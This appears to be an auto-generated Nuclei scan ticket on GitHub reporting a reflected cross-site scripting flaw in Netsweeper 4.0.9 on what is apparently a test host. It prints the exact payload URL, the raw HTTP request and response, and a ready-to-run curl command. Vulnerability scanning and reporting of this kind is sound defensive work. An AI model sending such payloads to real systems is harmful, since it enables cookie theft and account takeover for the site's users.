search

mkrs2404 / tickets

0 stars 0 forks source link

Netsweeper 4.0.9 - Cross-Site Scripting (netsweeper-rxss) found on honey.scanme.sh #58

Closed mkrs2404 closed 1 month ago

mkrs2404 commented 4 months ago

Details: netsweeper-rxss matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename&offset=1&offset&count=1000&sortorder&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sortitem&filter

Timestamp: Tue Apr 30 19:28:58 +0530 IST 2024

Template Information

Key Value
Name Netsweeper 4.0.9 - Cross-Site Scripting
Authors daffainfo
Tags edb, xss, packetstorm, netsweeper
Severity high
Description Netsweeper 4.0.9 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
CVSS-Metrics CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
CWE-ID CWE-79
CVSS-Score 7.20

Request

GET /webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename&offset=1&offset&count=1000&sortorder&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sortitem&filter HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.54
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 439
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:58:58 GMT

GET /webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename&offset=1&offset&count=1000&sortorder&log=</script><script>alert(document.domain)</script>&sortitem&filter HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.54

References:

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.54' 'https://honey.scanme.sh/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename&offset=1&offset&count=1000&sortorder&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sortitem&filter'

Generated by Nuclei v3.2.5